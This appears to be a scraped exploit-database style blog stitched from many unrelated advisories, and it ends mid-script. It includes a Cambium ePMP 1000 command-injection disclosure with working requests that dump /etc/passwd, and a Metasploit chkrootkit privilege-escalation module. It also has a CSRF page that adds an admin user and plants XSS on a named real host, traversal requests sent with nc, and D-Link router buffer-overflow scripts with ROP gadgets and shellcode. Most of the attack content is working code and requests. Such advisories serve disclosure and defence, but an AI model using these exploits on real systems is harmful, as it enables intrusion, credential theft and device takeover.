*July 14, 2015: *First contacted Cambium
*July 14, 2015: *Initial vendor response
*July 16, 2015: *Vuln Details reported to Cambium
*July 31, 2015:* Followup on advisory and fix timelines
*August 03, 2015: *Vendor gives mid-Aug as fix (v2.5) release
timeline. Ceases communication.
*Nov 19, 2015: *Releasing vulnerability details & poc
*Versions affected*: < v2.5
.....
*CVE-IDs* - To be assigned.
.....
*Background *
http://www.cambiumnetworks.com/products/access/epmp-1000/
ePMP™ 1000
Wireless service providers and enterprises need reliable, high-quality
broadband connectivity that can be rapidly deployed and expanded. The
ePMP platform provides stable coverage across large service areas and
enhances your existing infrastructure.
*Deployed by:*
ION Telecom
Kayse Wireless
Vanilla Telecom
Traeger Park
EszakNet
Edera
Videon
COMeSER
Seattle, WA
Budapest Video Surveillance
Desktop
Silo Wireless
Rocket Broadband
Snavely Forest Products
KRK Sistemi
KAJA Komputer
Root Media
*Vulnerability Details*
*From Cambium Networks ePMP 1000 user / configuration guide:
*
ePMP 1000 has four (4) users -
- ADMINISTRATOR, who has full read and write permissions.
- INSTALLER, who has permissions to read and write parameters
applicable to unit installation and monitoring.
- HOME, who has permissions only to access pertinent information for
support purposes
- READONLY, who only has permissions to view the Monitor page.
.....
1. *OS Command Injection *
'admin' and 'installer' users have access to perform Ping and
Traceroute functions via GUI. No other user has this access.
Ping function accepts destination IP address value via 'ping_ip
parameter and uses three (3) other parameters - packets_num, buf_size
and ttl, to perform Ping.
Traceroute function accepts destination IP address via 'traceroute_ip'
parameter.
The application does not perform strict input validation for all these
parameters - ping_ip', packets_num, buf_size and ttl for Ping
function; and traceroute_ip for Traceroute function.
This allows an authenticated user - 'admin' or non-admin,
low-privileged 'installer' & ‘home’ users - to be able to inject
arbitrary system commands that gets executed by the host.
.....
*PING PoC *
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0
[
*or*
ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0
*or*
ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0
*or*
ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0
]
.....
HTTP Response
.....
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
.....
*traceroute - PoC
*
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0
.....
HTTP Response
.....
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 16:09:26 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
.....
2. *Weak Authorization Controls + privilege escalation*
'home' and 'readonly' users do not have access to Ping and Traceroute
functions via management portal. However, the application lacks strict
authorization controls, and we can still perform both these functions
by sending corresponding HTTP(S) requests directly, when logged in as
low-privileged, 'home' user.
When we combine this flaw with above described OS Command Injection
affecting ping and traceroute, it is possible for non-admin,
low-privileged, ‘home’ user to execute system level commands via
'ping' and 'traceroute' functions and dump password hashes easily and
/ or perform any system level functions.
*Note*: ‘readonly’ user cannot perform this. Only ‘home’ user can
exploit these.
.....
*Steps to attack -
*
a login as home user
b craft & send HTTP request for ping and traceroute functions
.....
Login - HTTP Request
..
POST /cgi-bin/luci HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=home&password=<password>
.....
Login - HTTP Response
..
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Set-Cookie: sysauth=<home-sysauth_value>;
path=/cgi-bin/luci/;stok=<home-stok-value>
Content-Type: application/json
Expires: 0
Date: Sun, 18 Jan 1970 16:40:50 GMT
Server: Cambium HTTP Server
{ "stok": <home-stok_value>", "certif_dir": "/tmp/new_certificates/",
"status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status }
..
*Sending HTTP request for Ping function
*
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<home-sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Home User; usernameType=home; stok=<home-stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0
.....
HTTP Response
.....
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
..
Similarly, Traceroute function can be exploited.
......................................................................................................................................................
3. *Weak Authorization Controls + Information Disclosure*
In addition to 'admin', only 'installer' user has the option to access
device configuration. ‘home’ user does not have GUI option and should
not be able to access / download device configuration. However, the
application lacks strict authorization measures and the low-privileged
'home' user can gain unauthorized access to the device configuration
simply by requesting it.
*Configuration backup export* can be performed by directly accessing
the following url:
*http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json
*
Upon a successful config export, full device configuration with
clear-text passwords, usernames, keys, IP addresses, statistics, logs
etc is downloaded.
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: application/json
Content-Disposition: attachment; filename=<filename>.json
Expires: 0
Date: Sun, 18 Jan 1970 16:50:21 GMT
Server: Cambium HTTP Server
{
"template_props":
{
"templateName":"",
"templateDescription":"",
"device_type":"",
…
<output - snipped>
…
}
.....
Best Regards,
Karn Ganeshen
--
Best Regards,
Karn Ganeshen
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863147338
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
# This could also be Excellent, but since it requires
# up to one day to pop a shell, let's set it to Manual instead.
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Chkrootkit Local Privilege Escalation',
'Description' => %q{
Chkrootkit before 0.50 will run any executable file named
/tmp/update as root, allowing a trivial privsec.
WfsDelay is set to 24h, since this is how often a chkrootkit
scan is scheduled by default.
},
'Author' => [
'Thomas Stangner', # Original exploit
'Julien "jvoisin" Voisin' # Metasploit module
],
'References' => [
['CVE', '2014-0476'],
['OSVDB', '107710'],
['EDB', '33899'],
['BID', '67813'],
['CWE', '20'],
['URL', 'http://seclists.org/oss-sec/2014/q2/430']
],
'DisclosureDate' => 'Jun 04 2014',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => ['shell', 'meterpreter'],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
))
register_options([
OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
])
end
def check
version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
if version =~ /chkrootkit version 0\.[1-4]/
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_warning('Rooting depends on the crontab (this could take a while)')
write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
cmd_exec('chmod +x /tmp/update')
register_file_for_cleanup('/tmp/update')
print_status('Payload written to /tmp/update')
print_status('Waiting for chkrootkit to run via cron...')
end
end
Source: https://code.google.com/p/google-security-research/issues/detail?id=507
We have observed a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files. An example of a crash log excerpt generated after triggering the bug is shown below:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fffff900c49ab000, memory referenced
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation
Arg3: fffff96000324c14, if non-zero, the address which referenced memory.
Arg4: 0000000000000000, (reserved)
[...]
FAULTING_IP:
win32k!or_all_N_wide_rotated_need_last+70
fffff960`00324c14 410802 or byte ptr [r10],al
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD6
CURRENT_IRQL: 0
TRAP_FRAME: fffff88007531690 -- (.trap 0xfffff88007531690)
.trap 0xfffff88007531690
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff880075318ff rbx=0000000000000000 rcx=0000000000000007
rdx=00000000000000ff rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000324c14 rsp=fffff88007531820 rbp=fffffffffffffff5
r8=00000000ffffffff r9=fffff900c1b48995 r10=fffff900c49ab000
r11=0000000000000007 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
win32k!or_all_N_wide_rotated_need_last+0x70:
fffff960`00324c14 410802 or byte ptr [r10],al ds:0b08:fffff900`c49ab000=??
.trap
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff8000294a017 to fffff800028cd5c0
STACK_TEXT:
fffff880`07531528 fffff800`0294a017 : 00000000`00000050 fffff900`c49ab000 00000000`00000001 fffff880`07531690 : nt!KeBugCheckEx
fffff880`07531530 fffff800`028cb6ee : 00000000`00000001 fffff900`c49ab000 fffff900`c4211000 fffff900`c49ab002 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`07531690 fffff960`00324c14 : 00000000`0000001f fffff960`000b8f1f fffff900`c4ed2f08 00000000`0000001f : nt!KiPageFault+0x16e
fffff880`07531820 fffff960`000b8f1f : fffff900`c4ed2f08 00000000`0000001f 00000000`00000002 00000000`00000007 : win32k!or_all_N_wide_rotated_need_last+0x70
fffff880`07531830 fffff960`000eba0d : 00000000`00000000 fffff880`07532780 00000000`00000000 00000000`0000000a : win32k!draw_nf_ntb_o_to_temp_start+0x10f
fffff880`07531890 fffff960`000c5ab8 : 00000000`00000000 fffff900`c49aad60 fffff900`c4ed2ed0 00000000`00ffffff : win32k!vExpandAndCopyText+0x1c5
fffff880`07531c30 fffff960`00874b4b : fffff900`0000000a fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 : win32k!EngTextOut+0xe54
fffff880`07531fc0 fffff900`0000000a : fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 00000000`00000000 : VBoxDisp+0x4b4b
fffff880`07531fc8 fffff880`00000002 : fffff900`c4484ca0 fffff880`07532368 00000000`00000000 fffff880`07532110 : 0xfffff900`0000000a
fffff880`07531fd0 fffff900`c4484ca0 : fffff880`07532368 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 : 0xfffff880`00000002
fffff880`07531fd8 fffff880`07532368 : 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 : 0xfffff900`c4484ca0
fffff880`07531fe0 00000000`00000000 : fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 fffff900`c49b6c30 : 0xfffff880`07532368
---
While the above is only one example, we have seen the issue manifest itself in a variety of ways: either by crashing while trying to write beyond a pool allocation in the win32k!or_all_4_wide_rotated_need_last, win32k!or_all_N_wide_rotated_need_last, win32k!or_all_N_wide_rotated_no_last or win32k!or_all_N_wide_unrotated functions, or in other locations in the kernel due to system instability caused by pool corruption. In all cases, the crash occurs somewhere below a win32k!EngTextOut function call, i.e. it is triggered while trying to display the glyphs of a malformed TTF on the screen, rather than while loading the font in the system.
We believe the condition to be a pool-based buffer overflow triggered by one of the above win32k.sys functions, with a binary -or- operation being performed on bytes outside a pool allocation. This is also confirmed by the fact that various system bugchecks we have observed are a consequence of the kernel trying to dereference addresses with too many bits set, e.g.:
---
rax=fffff91fc29b4c60 rbx=0000000000000000 rcx=fffff900c4ede320
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000271f6a rsp=fffff880035b8bd0 rbp=fffff880035b9780
r8=000000000000021d r9=fffff900c4edf000 r10=fffff880056253f4
r11=fffff900c4902eb0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
win32k!PopThreadGuardedObject+0x16:
fffff960`00271f6a 4c8918 mov qword ptr [rax],r11 ds:0030:fffff91f`c29b4c60=????????????????
---
While we have not determined the specific root cause of the vulnerability, the proof-of-concept TTF files triggering the bug were created by taking legitimate fonts and replacing the glyph TrueType programs with ones generated by a dedicated generator. Therefore, the problem is almost certainly caused by some part of the arbitrary TrueType programs.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (typically leading to an immediate crash in one of the aforementioned functions when the overflow takes place), but it is also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with several proof-of-concept TTF files, together with corresponding kernel crash logs from Windows 7 64-bit.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38713.zip
source: https://www.securityfocus.com/bid/62064/info
Xibo is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Xibo 1.4.2 is vulnerable; other versions may also be affected.
<html>
<head>
<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
<!--
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
# http://infosec42.blogspot.com
# http://securityevaluators.com
-->
</head>
<body>
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
document.write('<form name="addAdmin" target ="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=user&q=AddUser&ajax=true" method="post">'+
'<input type="hidden" name="userid" value="0">'+
'<input type="hidden" name="username" value="Gimppy">'+
'<input type="hidden" name="password" value="ISE">'+
'<input type="hidden" name="email" value="Gimppy@infosec42.com">'+
'<input type="hidden" name="usertypeid" value="1">'+
'<input type="hidden" name="groupid" value="1">'+
'</form>');
}
//Set XSS Payloads
function RF2(){
document.write('<form name="addXSS" target="_blank" action="http://xibo.leland.k12.mi.us/index.php?p=layout&q=add&ajax=true" method="post">'+
'<input type="hidden" name="layoutid" value="0">'+
'<input type="hidden" name="layout" value="Gimppy<img src=42 onerror='alert(42)'>">'+
'<input type="hidden" name="description" value="<iframe src='http://securityevaluators.com' width=100 height=1000</iframe>">'+
'<input type="hidden" name="tags" value="">'+
'<input type="hidden" name="templateid" value="0">'+
'</form>');
}
function createPage(){
RF1();
RF2();
}
function _addAdmin(){
document.addAdmin.submit();
}
function _addXSS(){
document.addXSS.submit();
}
//Called Functions
createPage()
for (var i = 0; i < 2; i++){
if(i == 0){
window.setTimeout(_addAdmin, 0500);
}
else if(i == 1){
window.setTimeout(_addXSS, 1000);
}
else{
continue;
}
}
</script>
</body>
</html>
source: https://www.securityfocus.com/bid/62036/info
Aloaha PDF Suite is prone to a stack-based buffer-overflow vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/62036.zip
source: https://www.securityfocus.com/bid/62024/info
Nmap is prone to an arbitrary file-write vulnerability.
An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.
Nmap 6.25 is vulnerable; other versions may also be affected.
nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'
source: https://www.securityfocus.com/bid/61974/info
SearchBlox is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to obtain sensitive information that may aid in launching further attacks.
SearchBlox 7.4 Build 1 is vulnerable; other versions may also be affected.
http://www.example.com/searchblox/servlet/CollectionListServlet?action=getList&orderBy=colName&direction=asc
source: https://www.securityfocus.com/bid/62010/info
cm3 Acora CMS is prone to an information-disclosure vulnerability.
Successful exploits of this issue lead to disclosure of sensitive information which may aid in launching further attacks.
http://www.example.com/AcoraCMS/Admin/top.aspx
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQ4NjIxMDUxOQ9kFgJmD2QWAgIDD2QWAgIBD2QWCmYPFgIeBFRleHQFJERpZ2l0YWxTZWMgTmV0d29ya3MgV2Vic2l0ZWQCAQ8WAh8ABQpFbnRlcnByaXNlZAICDw8WAh8ABQt2NS40LjUvNGEtY2RkAgMPFgIfAAUgQW5vbnltb3VzIChQdWJsaWMgSW50ZXJuZXQgVXNlcilkAgQPDxYCHgdWaXNpYmxlaGRkZIL9u8OSlqqnBHGwtssOBV5lciAoCg" /></div>
source: https://www.securityfocus.com/bid/61964/info
Plone is prone to a session-hijacking vulnerability.
An attacker can exploit this issue to hijack user sessions and gain unauthorized access to the affected application.
Note: This issue was previously discussed in the BID 61544 (Plone Multiple Remote Security Vulnerabilities), but has been moved to its own record to better document it.
https://www.example.com/acl_users/credentials_cookie_auth/require_login?next=+https%3A//www.csnc.ch
source: https://www.securityfocus.com/bid/61906/info
Twilight CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
Twilight CMS 0.4.2 is vulnerable; other versions may also be affected.
nc [www.example.com] 80 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
nc [www.example.com] 80 GET demosite/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/TwilightCMS/Sites/company_site/Data/user list.dat HTTP/1.1
Source: https://code.google.com/p/google-security-research/issues/detail?id=521
Fuzzing the ZIP file format found multiple memory corruption issues, some of which are obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM on any system with Kaspersky Antivirus.
This testcase should fault by jumping to an unmapped address
(aac.fa4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=cccccccc ebx=00000000 ecx=01bc2974 edx=73a10002 esi=02e0a598 edi=5b2266bb
eip=cccccccc esp=05dde330 ebp=05dde354 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
cccccccc ?? ???
# where did that come from?
0:036> kvn 2
# ChildEBP RetAddr Args to Child
00 05dde32c 739fd847 02e0a598 05dde370 00000000 0xcccccccc
01 05dde354 739fe438 01bc2974 002266bb 05dde370 prcore!PragueUnload+0x2687
0:036> ub 739fd847 L9
prcore!PragueUnload+0x2673:
739fd833 8b4d08 mov ecx,dword ptr [ebp+8]
739fd836 8b7104 mov esi,dword ptr [ecx+4]
739fd839 8975ec mov dword ptr [ebp-14h],esi
739fd83c 85f6 test esi,esi
739fd83e 740a je prcore!PragueUnload+0x268a (739fd84a)
739fd840 8b16 mov edx,dword ptr [esi]
739fd842 8b02 mov eax,dword ptr [edx]
739fd844 56 push esi
739fd845 ffd0 call eax
# that pointer is in edx
0:088> dd edx
739a0002 cccccccc cccccccc cccccccc 8b55cccc
739a0012 77e95dec ccffffff cccccccc 8b55cccc
739a0022 0c4d8bec 8b04418b 42390855 501a7504
739a0032 0a8b018b d3e85150 83fffff9 c0850cc4
739a0042 01b80775 5d000000 5dc033c3 8b55ccc3
739a0052 0c4d8bec 8b04418b 42390855 501a7504
739a0062 0a8b018b 63e85150 83fffff9 c0850cc4
739a0072 01b80775 5d000000 5dc033c3 6c83ccc3
# So what is that?
0:088> !address edx
Usage: Image
Base Address: 73971000
End Address: 739aa000
Region Size: 00039000
State: 00001000 MEM_COMMIT
Protect: 00000020 PAGE_EXECUTE_READ
Type: 01000000 MEM_IMAGE
Allocation Base: 73970000
Allocation Protect: 00000080 PAGE_EXECUTE_WRITECOPY
Image Path: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\prcore.dll
Module Name: prcore
Loaded Image Name: C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.2\prcore.dll
Mapped Image Name:
0:088> !chkimg prcore
0 errors : prcore
# Hmm, so why is esi pointing there?
0:088> !address esi
Mapping file section regions...
Mapping module regions...
Mapping PEB regions...
Mapping TEB and stack regions...
Mapping heap regions...
Mapping page heap regions...
Mapping other regions...
Mapping stack trace database regions...
Mapping activation context regions...
Usage: Heap
Base Address: 02a00000
End Address: 02c33000
Region Size: 00233000
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
Type: 00020000 MEM_PRIVATE
Allocation Base: 02a00000
Allocation Protect: 00000004 PAGE_READWRITE
More info: heap owning the address: !heap 0x4a0000
More info: heap segment
More info: heap entry containing the address: !heap -x 0x2bf4760
0:088> !heap -x 0x2bf4760
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------------------------------
02bf4758 02bf4760 004a0000 02b00ac8 60 - 0 LFH;free
# So looks like an exploitable use after free vulnerability.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38736.zip
## Advisory Information
Title: DIR-817LW Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-817LW -- Wireless AC750 Dual Band Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Reboot shellcode in there
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #s0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # points to rop3
#buf+="1"*17 # exit payload
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian
buf+="Y"*120 # ROP gadget 2 that loads into $t9
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# Working
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5
